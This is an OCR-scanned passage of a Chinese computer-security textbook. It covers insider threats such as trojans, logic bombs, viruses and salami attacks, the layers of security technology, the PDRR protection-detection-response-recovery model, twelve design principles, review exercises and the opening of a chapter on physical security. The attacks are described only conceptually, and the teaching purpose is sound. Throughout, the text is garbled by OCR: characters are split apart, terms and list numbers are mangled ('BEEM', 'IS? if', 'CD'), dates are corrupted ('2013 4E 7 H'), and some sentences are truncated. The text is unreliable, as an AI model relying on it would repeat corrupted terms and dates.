他 们 通常 是 能 够 深入 系统 里 面 去 的 人 ,构成 的 威胁 极 大 ,有 以 下 方面 。 

CD 特洛伊 木马 : 修改 某 些 程序 ,使 得 这 些 程序 仍 能 正常 工作 ,看 上 去 是 好 的 ,实际 上 其 
中 隐藏 着 一 些 破 坏 性 的 指令 。 

© BEEM: 一 种 只 有 当 特 定 事件 出 现 才 进行 破坏 的 程序 。 

© 病毒 : 实际 上 是 一 种 逻辑 炸弹 ,不 同 之 处 在 于 它 不 断 地 繁殖 其 自身 。 

CD 滥用 实用 程序 : 有 些 机 器 上 的 实用 程序 可 以 被 修改 以 满足 不 同 的 需要 ,攻击 者 可 利 
用 实用 程序 达到 自己 的 目的 。 

C) 意大利 香肠 术 : 这 是 对 财务 系统 进行 的 攻击 。 它 从 每 个 客户 的 账目 中 偷 出 一 点 点 
钱 , 客 户 往往 不 注意 这 种 微弱 损失 ,而 攻击 者 将 众多 客户 的 钱 加 在 一 起 ,其 数目 很 大 。 

对 于 上 面 这 些 攻 击 ,很 难 防止 。 有 效 的 办 法 就 是 加 强 管理 ,选择 可 靠 的 系统 工作 人 员 ， 
记录 这 些 人 的 行为 ,以 便 及 时 准确 地 发 现 蓄意 破坏 者 。 

总 之 ,由 于 计算 机 系统 的 脆弱 以 及 面临 的 各 种 威胁 ,因此 ,计算 机 系统 安全 研究 的 重要 
性 不 言 而 喻 。 


13 计算 机 安全 技术 体系 结构 


计算 机 安全 技术 是 一 门 综合 的 学 科 , 它 涉及 信息 论 、 计 算 机 科学 和 密码 学 等 多 方面 知 
识 , 它 的 主要 任务 是 研究 计算 机 系统 和 通信 网 络 内 信息 的 保护 方法 以 实现 系统 内 信息 的 安 
全 ,保密 、 真 实 和 完整 。 一 个 完整 的 计算 机 安全 技术 体系 结构 由 物理 安全 技术 、 基 础 安全 技 
术 、 系 统 安全 技术 、 网 络 安全 技术 以 及 应 用 安全 技术 组 成 。 


1.3.1 实体 和 基础 设施 安全 技术 


实体 和 基础 设施 (物理 ) 安 全 在 整个 计算 机 网 络 信息 系统 安全 体系 中 占有 重要 地 位 。 计 
算 机 信息 系统 物理 安全 的 内 涵 是 保护 计算 机 信息 系统 设备 ,设施 以 及 其 他 媒体 免 遭 地 震 、 水 
灾 、 火 灾 等 环境 事故 以 及 人 为 操作 失误 或 错误 及 各 种 计算 机 犯罪 行为 导致 的 破坏 。 包 含 的 
主要 内 容 为 环境 安全 设备 安全 、 电 源 系 统 安全 和 通信 线路 安全 。 

(1) 环境 安全 。 计 算 机 网 络 通信 系统 的 运行 环境 应 按照 国家 有 关 标 准 设计 实施 ,应 具 
备 消 防 报警 .安全 照明 .不 间断 供电 、 温 湿度 控制 系统 和 防盗 报警 ,以 保护 系统 免 受 水 、 火 、 有 
害 气 体 、 地 震 、 静 电 的 危害 。 

(2) 设备 安全 。 要 保证 硬件 设备 随时 处 于 良好 的 工作 状态 ,建立 健全 的 管理 规章 制度 ， 
建立 设备 运行 日 志 。 同 时 要 注意 保护 存储 介质 的 安全 性 ,包括 存储 介质 自身 和 数据 的 安全 。 
存储 介质 本 身 的 安全 主要 是 安全 保管 防盗, 防 毁 和 防 霉 ; 数据 安全 是 指 防止 数据 被 非法 复 
制 和 非法 销毁 ,关于 存储 与 数据 安全 这 一 问题 将 在 下 一 章 具 体 介 绍 和 解决 。 

(3) 电源 系统 安全 。 电 源 是 所 有 电子 设备 正常 工作 的 能 量 源 ,在 信息 系统 中 占有 重要 
地 位 。 电 源 安 全 主要 包括 电力 能 源 供 应 、 输 电线 路 安全 、 保 持 电源 的 稳定 性 等 。 

(4) 通信 线路 安全 。 通 信 设 备 和 通信 线路 的 装置 安装 要 稳固 牢靠 ,具有 一 定 对 抗 自 然 
因素 和 人 为 因素 破坏 的 能 力 , 包 括 防止 电磁 信息 的 泄露 .线路 截获 以 及 抗 电 磁 干 扰 。 


1.3.2 密码 技术 


随 着 计算 机 网 络 不 断 渗透 到 各 个 领域 ,密码 学 的 应 用 也 随 之 扩大 。 数 字 签 名 .身份 鉴别 
等 都 是 由 密码 学 派生 出 来 的 新 技术 和 应 用 。 

密码 技术 是 保障 信息 安全 的 核心 技术 。 密 码 技术 在 古代 就 已 经 得 到 应 用 ,但 仅 限于 外 
交 和 军事 等 重要 领域 。 随 着 现代 计算 机 技术 的 飞速 发 展 ,密码 技术 正在 不 断 向 更 多 其 他 领 
域 渗透 。 它 是 结合 数学 、 计 算 机 科学 、 电 子 与 通信 等 诸多 学 科 于 一 身 的 交叉 学 科 , 它 不 仅 具 
有 保证 信息 机 密 性 的 信息 加 密 功 能 ,而 且 具 有 数字 签名 、 身 份 验证 、 秘 密 分 存 、 系 统 安全 等 功 
能 。 所 以 ,使 用 密码 技术 不 仅 可 以 保证 信息 的 机 密 性 ,而 且 可 以 保证 信息 的 完整 性 和 确定 
性 ,防止 信息 被 自 改 ,伪造 和 假冒 。 

密码 学 包括 密码 编码 学 和 密码 分 析 学 .密码 体制 的 设计 是 密码 编码 学 的 主要 内 容 ,密码 
体制 的 破译 是 密码 分 析 学 的 主要 内 容 . 密 码 编码 技术 和 密码 分 析 技 术 是 相互 依存 ,互相 支 
持 , 密 不 可 分 的 两 个 方面 。 

从 密码 体制 方面 而 言 ,密码 体制 有 对 称 密 钥 密码 技术 和 非 对 称 密 钥 密 码 技 术 , 对 称 密 钥 
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密码 技术 要 求 加 密 解 密 双 方 拥有 相同 的 密 钥 。 非 对 称 密 钥 密码 技术 是 加 密 解 密 双方 拥有 不 
相同 的 密 钥 。 

密码 学 不 仅 包含 编码 与 破译 ,而 且 包 括 安 全 管理 .安全 协议 设计 、 散 列 函 数 等 内 容 。 不 
仅 如 此 ,密码 学 的 进一步 发 展 ,涌现 了 大 量 的 新 技术 和 新 概念 ,如 零 知识 证 明 技术 、 盲 签名 、 
比特 承诺 、 遗 忘 传递 数字 化 现金 .量子 密码 技术 、 混 沌 密码 等 。 

我 国明 确 规定 严格 禁止 直接 使 用 国外 的 密码 算法 和 安全 产品 ,这 主要 有 两 个 原因 : 一 
是 国外 禁止 出 口 密码 算法 和 产品 ,所 谓 出 口 的 安全 密码 算法 国外 都 有 破译 手段 ; 二 是 担心 
国外 的 算法 和 产品 中 存在 “后 门 ”, 关 键 时 刻 危害 我 国安 全 。 当 前 我 国 的 信息 安全 系统 由 国 
家 密码 管理 委员 会 统一 管理 。 


1.3.3 操作 系统 安全 技术 


随 着 社会 信息 化 的 发 展 ,计算 机 安全 问题 日 益 严 重 ,建立 安全 防范 体系 的 需求 越 来 越 强 
烈 。 操 作 系统 是 整个 计算 机 信息 系统 的 核心 ,操作 系统 安全 是 整个 安全 防范 体系 的 基础 , 同 
时 也 是 计算 机 安全 的 重要 内 容 。 

操作 系统 的 安全 功能 主要 包括 : 标识 与 鉴别 、 自 主 访问 控制 (DAC)、 强 制 访问 控制 
(MAC) .安全 审计 、 客 体重 用 、 最 小 特权 管理 、 可 信和 路 径 、 隐 蔽 通道 分 析 、 加 密 卡 支持 等 。 

另外 , 随 着 计算 机 技术 的 飞速 发 展 ,数据 库 的 应 用 十 分 广泛 ,深入 各 个 领域 ,但 随 之 而 来 
产生 了 数据 的 安全 问题 。 各 种 应 用 系统 的 数据 库 中 大 量 数据 的 安全 问题 敏感 数据 的 防 窃 
取 和 防 算 改 问题 , 越 来 越 引起 人 们 的 高 度 重视 。 数 据 库 系 统 作为 信息 的 聚集 体 ,是 计算 机 信 
息 系 统 的 核心 部 件 , 其 安全 性 至 关 重 要 ,关系 到 企业 兴衰 ,成 败 。 因 此 ,如 何 有 效 地 保证 数据 
库 系 统 的 安全 ,实现 数据 的 保密 性 、 完 整 性 和 有 效 性 ,已 经 成 为 业界 人 士 探索 研究 的 重要 课 
题 之 一 。 

数据 库 安全 性 问题 一 直 是 数据 库 用 户 非常 关心 的 问题 。 数 据 库 往往 保存 着 生产 和 工作 
需要 的 重要 数据 和 资料 ,数据 库 数据 的 丢失 以 及 数据 库 被 非法 用 户 的 侵入 往往 会 造成 无 法 
估量 的 损失 ,因此 ,数据 库 的 安全 保密 成 为 一 个 网 络 安全 防护 中 非常 需要 重视 的 环节 ,要 维 
护 数据 信息 的 完整 性 .保密 性 、. 可 用 性 。 

数据 库 系统 的 安全 除 依赖 自身 内 部 的 安全 机 制 外 ,还 与 外 部 网 络 环境 .应 用 环境 从业 
人 员 素 质 等 因素 有 关 , 因 此 ,从 广义 上 讲 , 数 据 库 系统 的 安全 框架 可 以 划分 为 3 个 层次 : 

COD 网 络 系统 层次 ; 

(2) 宿主 操作 系统 层次 ; 

CD 数据 库 管 理 系 统 层 次 。 

这 3 个 层次 构筑 成 数据 库 系 统 的 安全 体系 ,与 数据 安全 的 关系 是 逐步 紧密 的 ,防范 的 重 
要 性 也 逐 层 加 强 , 从 外 到 内 、 由 表 及 里 保证 数据 的 安全 。 


1.3.4 计算 机 网 络 安全 技术 


一 个 最 常见 的 网 络 安全 模型 是 PDRR 模型 。PDRR 是 指 Protection( 防 护 )、Detection 
(检测 )、Response( 响 应 )、Recovery( 恢 复 )。 这 4 个 部 分 构成 了 一 个 动态 的 信息 安全 周期 ， 
如 图 1-1 所 示 。 

安全 策略 的 每 一 部 分 包括 一 组 相应 的 安全 措施 来 实施 一 定 的 安全 功能 。 安 全 策略 的 第 


图 1-1 PDRR 网 络 安全 模型 


一 部 分 是 防护 。 根 据 系统 已 知 的 所 有 安全 问题 做 出 防护 措施 ,比如 : 打 补丁 .访问 控制 和 数 
据 加 密 等 。 安 全 策略 的 第 二 部 分 是 检测 ,攻击 者 如 果 穿 过 了 防护 系统 ,检测 系统 就 会 检测 出 
入 侵 者 的 相关 信息 ,一 旦 检测 出 入 侵 , 响 应 系统 开始 采取 相应 的 措施 。 安 全 策略 的 最 后 一 部 
分 是 系统 恢复 ,在 入 侵 事 件 发 生 后 ,把 系统 恢复 到 原来 的 状态 。 每 次 发 生 入 侵 事 件 ,防护 系 
统 都 要 更 新 ,保证 相同 类 型 的 入 侵 事 件 不 能 再 次 发 生 ,所 以 整个 安全 策略 包括 防护 .检测 、 响 
应 和 恢复 ,这 4 个 方面 组 成 了 一 个 信息 安全 周期 。 

1. 防护 

网 络 安全 策略 PDRR 模型 的 最 重要 的 部 分 就 是 防护 (P) 。 防 护 是 预先 阻止 攻击 可 以 发 
生 条 件 的 产生 ,让 攻击 者 无 法 顺利 入 侵 ,防护 可 以 减少 大 多 数 的 和 人 侵 事件 。 

CD 缺陷 扫描 。 安 全 缺陷 分 为 两 种 : 允许 远程 攻击 的 缺陷 和 只 允许 本 地 攻击 的 缺陷 。 

允许 远程 攻击 的 缺陷 是 指 攻击 者 可 以 利用 该 缺陷 ,通过 网 络 攻击 系统 。 

只 允许 本 地 攻击 的 缺陷 是 指 攻 击 者 不 能 通过 网 络 利用 该 缺陷 攻击 系统 。 

对 于 允许 远程 攻击 的 安全 缺陷 ,可 以 用 网 络 缺 陷 扫 描 工 具 去 发 现 。 网 络 缺 陷 扫 描 工 具 
一 般 从 系统 的 外 边 去 观察 。 其 次 , 它 扮演 一 个 黑客 的 角色 ,只 不 过 它 不 会 破坏 系统 。 缺 陷 扫 
描 工 具 首 先 扫 描 系 统 所 开放 的 网 络 服务 端口 。 然 后 通过 该 端口 进行 连接 ,试探 提供 服务 的 
软件 类 型 和 版 本 号 。 在 这 个 时 候 , 缺 陷 扫 描 工 具有 两 种 方法 去 判断 该 端口 是 否 有 缺陷 : 第 
一 种 方法 是 根据 版 本 号 ,在 缺陷 列表 中 查 出 是 否 存在 缺陷 。 第 二 种 方法 是 根据 已 知 的 缺陷 
特征 ,模拟 一 次 攻击 ,如 果 有 可 能 会 成 功 ,就 停止 下 来 ,并 可 以 初步 断定 系统 中 有 缺陷 存在 
(要 停止 模拟 攻击 以 避免 对 系统 造成 损害 )。 显 然 第 二 种 方法 的 准确 性 比 第 一 种 要 高 ,但 是 
扫描 的 速度 会 很 慢 。 

(2) 访问 控制 及 防火 墙 。 访 问 控制 限制 某 些 用 户 对 某 些 资源 的 操作 。 访 问 控制 通过 减 
少 用 户 对 资源 的 访问 ,从 而 减少 资源 被 攻击 的 概率 ,达到 防护 系统 的 目的 。 例 如 只 让 可 信和 的 
用 户 访问 资源 而 不 让 其 他 用 户 访问 资源 ,这 样 资源 受到 攻击 的 概率 几乎 很 小 。 防 火 墙 是 基 
于 网 络 的 访问 控制 技术 ,在 互联 网 中 已 经 有 着 广泛 的 应 用 。 防 火 墙 技术 可 以 工作 在 网 络 层 、 
传输 层 和 应 用 层 , 完 成 不 同 力度 的 访问 控制 。 防 火 墙 可 以 阻止 大 多 数 的 攻击 但 不 是 全 部 ,很 
多 入 侵 事 件 通 过 防火 墙 所 允许 的 端口 (例如 80 端口 ) 进 行 攻击 。 

(3) 防 病毒 软件 与 个 人 防火 墙 。 病 毒 就 是 计算 机 的 一 段 可 执行 代码 。 一 旦 计算 机 被 感 
染 上 病毒 ,这 些 可 执行 代码 可 以 自动 执行 ,破坏 计算 机 系统 。 安 装 并 经 常 更 新 防 病毒 软件 会 
对 系统 安全 起 防护 作用 。 防 病毒 软件 根据 病毒 的 特征 ,检查 用 户 系统 上 是 否 有 病毒 。 这 个 
检查 过 程 可 以 是 定期 检查 ,也 可 以 是 实时 检查 。 


个 人 防火 墙 是 防火 墙 和 防 病毒 的 结合 。 它 运行 在 用 户 的 系统 中 ,并 控制 其 他 机 器 对 这 
台 机 器 的 访问 。 个 人 防火 墙 除 了 具有 访问 控制 功能 外 ,还 有 病毒 检测 ,甚至 有 入 侵 检 测 的 功 
能 ,是 网 络 安全 防护 的 一 个 重要 发 展 方向 。 

CA) 数据 加 密 。 加 密 技 术 保 护 数据 在 存储 和 传输 中 的 保密 性 安全 。 

(5) 鉴别 技术 。 鉴 别 技术 和 数据 加 密 技 术 有 很 紧密 的 关系 。 鉴 别 技术 用 在 安全 通信 
中 ,对 通信 双方 互相 鉴别 对 方 的 身份 以 及 传输 的 数据 。 鉴 别 技术 保护 数据 通信 的 两 个 方面 : 
通信 双方 的 身份 认证 和 传输 数据 的 完整 性 。 

2. 检测 

PDRR 模型 的 第 二 个 环节 就 是 检测 (D)。 防 护 系统 可 以 阻止 大 多 数 的 入 侵 事件 的 发 
生 , 但 是 不 能 阻止 所 有 的 入侵 。 特 别 是 那些 利用 新 的 系统 缺陷 、 新 的 攻击 手段 的 入 侵 。 因 此 
安全 策略 的 第 二 个 安全 屏障 就 是 检测 ,如 果 入 侵 发 生 就 会 被 检测 出 来 ,这 个 工具 是 入 侵 检 测 
系统 (Intrusion Detection System, IDS) 。 

根据 检测 环境 不 同 ,IDS 可 以 分 为 两 种 : 基于 主机 的 IDSCHostbased) 和 基于 网 络 的 
IDSCNetwork-based) 。 基 于 主机 的 IDS 检测 主机 上 的 系统 日 志 、 审 计数 据 等 信息 ; 基于 网 
络 的 IDS 检测 则 一 般 侧 重 于 网 络 流量 分 析 。 

根据 检测 所 使 用 方法 的 不 同 ,IDS 可 以 分 为 两 种 : 误 用 检测 (Misuse Detection) IS? if 
检测 (Anomaly Detection) 。 误 用 检测 技术 需要 建立 一 个 人 侵 规则 库 , 其 中 , 它 对 每 一 种 人 
侵 都 形成 一 个 规则 描述 ,只 要 发 生 的 事件 符合 某 个 规则 就 被 认为 是 入 侵 。 

入 侵 检测 系统 一 般 和 应 急 响 应 及 系统 恢复 有 密切 关系 。 一 旦 入 侵 检测 系统 检测 到 入 侵 
事件 , 它 就 会 将 入 侵 事 件 的 信息 传 给 应 急 响 应 系统 进行 处 理 。 

3. 响应 

PDRR 模型 中 的 第 三 个 环节 是 响应 (R)。 响 应 就 是 已 知 一 个 攻击 (入 侵 ) 事 件 发 生 之 后 
进行 相应 的 处 理 。 在 一 个 大 规模 的 网 络 中 ,响应 方面 的 工作 都 会 有 一 个 特殊 部 门 专门 负责 ， 
那 就 是 计算 机 响应 小 组 。 世 界 上 第 一 个 计算 机 响应 小 组 CERT 于 1989 年 建立 ,位 于 美国 
CMU 大 学 的 软件 研究 所 (SEI) 。 从 CERT 建立 之 后 ,世界 各 国 以 及 各 机 构 也 纷纷 建立 自己 
的 计算 机 响应 小 组 。 我 国 第 一 个 计算 机 紧急 响应 小 组 CCERT 于 1999 年 建立 ,主要 服务 于 
中 国教 育 和 科研 网 。 

入 侵 事 件 的 报警 可 以 是 入 侵 检测 系统 的 报警 ,也 可 以 是 通过 其 他 方式 的 汇报 。 响 应 的 
主要 工作 也 可 以 分 为 两 种 : 一 种 是 紧急 响应 ; 另 一 种 是 其 他 事件 处 理 。 紧 急 响 应 就 是 当 安 
全 事件 发 生 时 采取 应 对 措施 ; 其 他 事件 主要 包括 咨询 .培训 和 技术 支持 。 

4. 恢复 

恢复 是 PDRR 模型 中 的 最 后 一 个 环节 。 恢 复 是 事件 发 生 后 ,把 系统 恢复 到 原来 的 状 
态 , 或 者 比 原来 更 安全 的 状态 。 人 恢复 也 可 以 分 为 两 个 方面 : 系统 恢复 和 信息 恢复 。 


的 缺陷 入 侵 。 一 般 系统 恢复 包括 系统 升级 、 软 件 升 级 和 打 补 丁 等 。 系 统 恢复 的 男 一 个 重要 
工作 是 除去 后 门 。 一 般 来 说 ,黑客 在 第 一 次 入 侵 的 时 候 都 是 利用 系统 的 缺陷 。 在 第 一 次 入 
侵 成 功 之 后 ,黑客 就 在 系统 中 打开 一 些 后 门 ,如 安装 一 个 特洛伊 木马 。 所 以 ,尽管 系统 缺陷 
已 经 打 补丁 ,黑客 下 一 次 还 可 以 通过 后 门 进入 系统 。 

(2) 信息 恢复 。 信 息 恢 复 是 指 恢复 丢失 的 数据 。 数 据 丢 失 的 原因 可 能 是 由 于 黑客 入 侵 
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造成 的 ,也 可 能 是 由 于 系统 故障 .自然 灾害 等 原因 造成 的 。 信 息 恢复 就 是 从 备份 和 归档 的 数 
据 恢复 原来 的 数据 。 信 息 恢 复 过 程 与 数据 备份 过 程 有 很 大 的 关系 。 数 据 备 份 做 得 是 否 充 
分 ,对 信息 恢复 有 很 大 的 影响 。 信 息 恢复 过 程 的 一 个 特点 是 有 优先 级 别 。 直 接 影响 日 常生 
活 和 工作 的 信息 必须 先 恢复 ,这样 可 以 提高 信息 恢复 的 效率 。 


1.3.5 应 用 安全 技术 


目前 ,全 球 Internet 用 户 网 用 户 已 突破 30 亿 人 ,中 国 Internet 用 户 为 6.7 亿 人 。 大 部 
分 用 户 会 利用 网 络 进行 购物 .银行 转账 支付 、 网 络 聊天 和 各 种 软件 下 载 等 。 人 们 在 享受 网 络 
便捷 的 同时 ,网 络 环境 也 变 得 越 来 越 危险 ,比如 网 上 钓鱼 .垃圾 邮件 、 网 站 被 黑 、 企 业 上 网 账 
户 密码 被 窃取 .QQ 号 码 被 盗 .个 人 隐私 数据 被 窃取 等 时 常 发 生 。 因 此 ,对 每 一 个 使 用 网 络 
的 人 来 说 ,掌握 一 些 安全 技术 方面 的 知识 是 很 有 必要 的 。 


14 计算 机 安全 发 展 趋势 


随 着 计算 机 技术 的 快速 发 展 与 应 用 ,计算 机 安全 的 内 涵 在 不 断 地 延伸 ,从 最 初 的 信息 保 
密 性 发 展 到 信息 的 完整 性 、 可 用 性 、 可 控 性 和 不 可 否认 性 ,进而 又 发 展 为 * 攻 (攻击 )、 防 ( 防 
范 ) , 测 ( 检 测 ) 、 控 (控制 )、 管 (管理 )、 评 (评估 )” 等 多 方面 的 基础 理论 和 实施 技术 。 计 算 机 安 
全 的 核心 问题 是 密码 理论 及 其 应 用 。 目 前 ,在 计算 机 安全 领域 人 们 关注 的 焦点 主要 有 以 下 
几 方 面 : 

COD 密码 理论 与 技术 ; 

(2) 安全 协议 理论 与 技术 ; 

(3) 安全 体系 结构 理论 与 技术 ; 

(4) 信息 对 抗 理论 与 技术 ; 

(5) 网 络 安全 与 安全 产品 。 


15 安全 系统 设计 原则 


安全 防范 体系 在 整体 设计 过 程 中 应 遵循 以 下 12 项 原则 。 

1. 木 桶 原则 

木 桶 原则 是 指 对 信息 均衡 、 全 面 地 进行 保护 。 木 桶 的 最 大 容积 取决 于 最 短 的 一 块 木板 。 

2. 整体 性 原则 

整体 性 原则 要 求 在 网 络 发 生 被 攻击 、 破 坏事 件 的 情况 下 ,必须 尽 可 能 地 快速 恢复 网 络 信 
息 中 心 的 服务 ,减少 损失 。 因 此 ,计算 机 安全 系统 应 该 包括 安全 防护 机 制 、 安 全 检测 机 制 和 
安全 恢复 机 制 。 

3. 有 效 性 与 实用 性 原则 

有 效 性 与 实用 性 原则 是 不 能 影响 系统 的 正常 运行 和 合法 用 户 的 操作 活动 。 网 络 中 的 信 
息 安 全 和 信息 共享 存在 矛盾 : 一 方面 ,为 健全 和 弥补 系统 缺陷 或 漏洞 ,会 采取 多 种 技术 手段 
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和 管理 措施 ; 另 一 方面 ,势必 给 系统 的 运行 和 用 户 的 使 用 造成 负担 和 麻烦 ,尤其 在 网 络 环境 
下 ,实时 性 要 求 很 高 的 业务 不 能 容忍 安全 连接 和 安全 处 理 造成 的 时 延 和 数据 扩张 。 如 何在 
确保 安全 性 的 基础 上 ,把 安全 处 理 的 运算 量 减 小 或 分 挫 , 减 少 用 户 记 忆 、 存 储 工 作 和 安全 服 
务 器 的 存储 量 、 计 算 量 ,应 该 是 一 个 信息 安全 设计 者 首先 要 解决 的 问题 。 

4. 安全 性 评价 与 平衡 原则 

对 任何 网 络 , 绝 对 安全 难以 达到 ,所 以 需要 建立 合理 的 实用 安全 性 与 用 户 需 求 评价 与 平 
衡 体系 。 安 全 体系 设计 要 正确 人 处理 需求 .风险 与 代价 的 关系 ,做 到 安全 性 与 可 用 性 相 容 ,做 
到 组 织 上 可 执行 。 评 价 信 息 是 否 安全 ,没有 绝对 的 评判 标准 和 衡量 指标 ,只 能 决定 于 系统 的 
用 户 需 求 和 具体 的 应 用 环境 ,具体 取决 于 系统 的 规模 和 范围 .系统 的 性 质 和 信息 的 重要 
程度 。 

5. 标准 化 与 一 致 性 原则 

系统 是 一 个 庞大 的 系统 工程 ,其 安全 体系 的 设计 必须 遵循 一 系列 的 标准 ,这 样 才能 确保 
各 个 分 系统 的 一 致 性 ,使 整个 系统 安全 地 互联 互通 、 信 息 共 享 。 

6. 技术 与 管理 相 结合 原则 

安全 体系 是 一 个 复杂 的 系统 工程 ,涉及 人 、 技 术 、 操 作 等 要 素 , 单 靠 技术 或 单 靠 管理 都 不 
可 能 实现 。 因 此 ,必须 将 各 种 安全 技术 与 运行 管理 机 制 . 人 员 思 想 教 育 与 技术 培训 、 安 全 规 
章 制度 建设 相 结合 。 

7. 统筹 规划 ,分 步 实 施 原则 

由 于 政策 规定 、 服 务 需 求 的 不 明朗 ,环境 、 条 件 、 时 间 的 变化 ,攻击 手段 的 进步 ,安全 防护 
不 可 能 一 步 到 位 ,可 在 一 个 比较 全 面 的 安全 规划 下 ,根据 网 络 的 实际 需要 , 先 建立 基本 的 安 
全 体系 ,保证 基本 的 、 必 需 的 安全 性 。 随 着 今后 随 着 网 络 规模 的 扩大 及 应 用 的 增加 ,网 络 应 
用 和 复杂 程度 的 变化 ,网 络 脆 弱 性 也 会 不 断 增 加 ,应 调整 或 增强 安全 防护 力度 ,保证 整个 网 
络 最 根本 的 安全 需求 。 

8. 等 级 性 原则 

等 级 性 原则 是 指 安全 层次 和 安全 级 别 。 良 好 的 信息 安全 系统 必然 是 分 为 不 同等 级 
的 ,包括 对 信息 保密 程度 分 级 ,对 用 户 的 操作 权限 分 级 ,对 网 络 安全 程度 分 级 (安全 子 网 
和 安全 区 域 ) ,对 系统 实现 结构 的 分 级 (应 用 层 、 网 络 层 、 链 路 层 等 ) ,从 而 针对 不 同 级 别 的 
安全 对 象 ,提供 全 面 、. 可 选 的 安全 算法 和 安全 体制 ,以 满足 网 络 中 不 同 层次 用 户 的 各 种 实 

9. 动态 发 展 原则 

要 根据 网 络 安全 的 变化 不 断 调整 安全 措施 .以 便 适 应 新 的 网 络 环境 ,满足 新 的 网 络 安全 

10. 易 操作 性 原则 

首先 ,安全 措施 需要 人 为 去 完成 ,如 果 措 施 过 于 复杂 ,对 人 的 要 求 过 高 ,本身 就 降低 了 安 
全 性 。 其 次 ,措施 的 采用 不 能 影响 系统 的 正常 运行 。 

11. 自主 和 可 控 性 原则 

网 络 安全 与 保密 问题 关系 着 一 个 国家 的 主权 和 安全 ,所 以 网 络 安全 产品 不 可 能 依赖 于 
从 国外 进口 ,必须 解决 网 络 安全 产品 的 自主 权 和 自控 权 问题 ,应 建立 我 们 自主 的 网 络 安全 产 
品 和 产业 。 同 时 为 了 防止 安全 技术 被 不 正当 的 用 户 使 用 :必须 采取 相应 的 措施 对 其 进行 控 
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制 , 比 如 密 钥 托管 技术 等 。 

12. 权限 分 割 、 互 相 制约 .最 小 化 原则 

在 很 多 系统 中 都 有 一 个 系统 超级 用 户 或 系统 管理 员 ,拥有 对 系统 全 部 资源 的 存 取 和 分 
配 权 , 所 以 它 的 安全 至 关 重 要 ,如 果 不 加 以 限制 ,有 可 能 由 于 超级 用 户 的 恶意 行为 .口令 泄 
密 、 偶 然 破坏 等 对 系统 造成 不 可 估量 的 损失 和 破坏 。 因 此 有 必要 对 系统 超级 用 户 的 权限 加 
以 限制 ,实现 权限 最 小 化 原则 。 管 理 权限 应 有 交叉 ,由 几 个 管理 用 户 来 动态 地 进行 系统 的 管 
理 , 从 而 能 够 互相 制约 。 对 于 普通 用 户 , 则 实现 权限 最 小 原则 ,不 允许 其 进行 非 授权 以 外 的 
操作 。 


16 人 、 制 度 和 技术 之 间 的 关系 


信息 系统 安全 管理 包括 安全 技术 和 设备 的 管理 .安全 管理 制度 .部门 与 人 员 的 组 织 规则 
等 。 管 理 的 制度 化 极 大 程度 地 影响 着 整个 计算 机 网 络 系统 的 安全 ,严格 的 安全 管理 制度 、 明 
确 的 部 门 安全 职责 划分 、 合 理 的 人 员 和 角色 配 置 都 可 以 在 很 大 程度 上 降低 其 他 层次 的 安全 
漏洞 。 


17 本 章 小 结 


本 章 介绍 了 计算 机 安全 的 基本 概念 ,计算 机 系统 面临 的 威胁 、 计 算 机 安全 研究 的 重要 
性 ,计算 机 安全 技术 体系 结构 、 安 全 系统 设计 原则 以 及 人 ,制度 和 技术 之 间 的 关系 。 通 过 本 
章 的 学 习 , 使 读者 对 计算 机 安全 有 一 个 整体 的 认识 ,并 认识 到 计算 机 安全 对 于 国家 、 单 位 和 
个 人 都 是 至 关 重 要 的 。 


18 5 题 

1. 填空 题 

a) 是 指 秘密 信息 在 产生 ,传输 、 使 用 和 存储 的 过 程 中 不 被 泄露 或 破坏 。 

(2) 计算 机 安全 的 4 个 方面 : E n 和 不 可 否认 性 。 

(3) 计算 机 安全 主要 包括 系统 安全 和 两 个 方面 。 

(4) 是 指 系 统 在 规定 条 件 下 ,完成 规定 功能 的 能 力 。 

(5) 一 个 完整 的 计算 机 安全 技术 体系 结构 由 : \、 系 统 操 作 系 统 安全 技 
术 、 计 算 机 网 络 安全 技术 以 及 组 成 。 

(6) 一 个 最 常见 的 网 络 安全 模型 是 

2. 思考 与 简 答 题 


(1) 简 述 计算 机 系统 的 脆弱 性 。 
(25 简 述 计算 机 系统 面临 的 威胁 。 


(3) 简 述 PDRR 网 络 安全 模型 的 工作 过 程 。 
(4) 简 述 计算 机 安全 发 展 趋势 。 

(5) 简 述 安全 系统 设计 原则 。 

(6) 简 述 人 、 制 度 和 技术 之 间 的 关系 。 

(7) 简 述 自己 是 如 何 认识 计算 机 安全 的 。 
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本 章 学 习 目 标 

。 了解 实体 和 基础 设施 安全 的 定义 、 目 的 和 内 容 。 

。 了 人 解 环境 安全 的 相关 措施 。 

。 了 解 设备 安全 的 相关 措施 。 

。 了 人 解 供电 系统 安全 的 相关 措施 。 

* 了 解 通信 线路 安全 与 电磁 防护 的 相关 措施 。 

2015 年 5 月 27 日 ,由 于 杭州 市 萧山 区 某 处 的 光纤 被 控 断 ,造成 少 部 分 用 户 无 法 使 用 支 
IFE. 2013 4E 7 H 22 日 ,由 于 杭州 市 市 政道 路 建设 而 导致 网 络 光 缆 被 挖 断 , 造 成 即时 通信 
工具 微 信 发 生 大 规模 故障 ,用 户 不 能 登录 微 信 , 或 不 能 发 出 信息 及 上 传 图 片 等 。 故 障 波 及 北 
京 广 东 ` 浙 江 、 山东. 黑龙 江 等 地 ,海外 有 用 户 反映 也 受到 影响 。2006 4E 12 月 26 日 晚间 ， 
在 中 国 台湾 省 南部 海域 先后 发 生 了 7.2 级 和 6.7 级 地 震 , 受 这 次 强 震 影响 ,亚太 一 号 、 亚 太 
二 号 等 多 条 国际 海底 通信 光缆 也 发 生 中 断 , 造 成 我 国内 地 及 台湾 地 区 ,香港 地 区 ,美国 、 东 南 
亚 以 及 欧洲 等 方向 的 通信 线路 大 量 中 断 ,数据 .语音 业务 等 严重 受阻 。 这 些 是 计算 机 系统 物 
理 安全 遭 到 破坏 的 典型 例子 。 

实体 和 基础 设施 安全 主要 包括 环境 安全 ,设备 安全 ,电源 系统 安全 以 及 通信 线路 安全 
等 ,本 章 将 对 这 几 部 分 进行 详细 介绍 。 


21 物理 安全 的 重要 性 


1. 物理 安全 定义 

实体 和 基础 设施 安全 (物理 安全 ) 是 保护 计算 机 设备 .设施 (网 络 及 通信 线路 ) 免 遭 地 震 、 
水 灾 、 火 灾 、 有 害 气体 和 其 他 环境 事故 (如 电磁 污染 等 ) 破 坏 的 措施 和 过 程 。 

物理 安全 主要 考虑 的 问题 是 环境 场地 和 设备 的 安全 及 实体 访问 控制 和 应 急 处 理 计划 
等 。 保 证 计算 机 及 网 络 系统 机 房 的 安全 ,以 及 保证 所 有 组 成 信息 系统 设备 场地、 环境 及 通 
